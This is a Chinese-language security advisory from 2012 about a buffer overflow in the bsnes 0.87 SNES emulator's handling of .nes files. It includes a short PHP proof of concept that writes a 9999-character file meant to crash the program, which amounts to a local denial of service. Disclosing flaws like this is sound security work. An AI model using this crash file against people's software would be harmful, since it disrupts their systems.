发布日期:2012-05-25
更新日期:2012-05-29
受影响系统:
byuu bsnes 0.87
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53684
bsnes是基于Linux、Mac OS X、Windows的SNES模拟器。
bsnes 0.87在处理'.nes'文件的实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用中执行任意代码。
<*来源:Pr0T3cT10n (pr0t3ct10n@gmail.com)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
# bsnes v0.87 Local Daniel Of Service
# Tested on Windows 7 64Bit
# Software Site:
# Software Download:
# Author: Pr0T3cT10n
##################################################################
# bsnes v0.87 is vulnerable to local denial of service attack.
# When we try to open a file by 'Catridge' -> 'Load NES Catridge'
# that contains 9999 chars ('A'), so bsnes should crash.
##################################################################
# PoC / Code:
$buffer = str_repeat('A', 9999); # Create 9999 chars('A')..
if(file_put_contents('crash.nes', $buffer)) {
echo("File created successfuly.\r\bsnes should crash when you open the file with it.\r\n");
} else {
echo("Can't create file. Please try again.\r\n");
}
# Cya :)
# 0x31337.net
####################
?>
建议:
--------------------------------------------------------------------------------
厂商补丁:
byuu
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
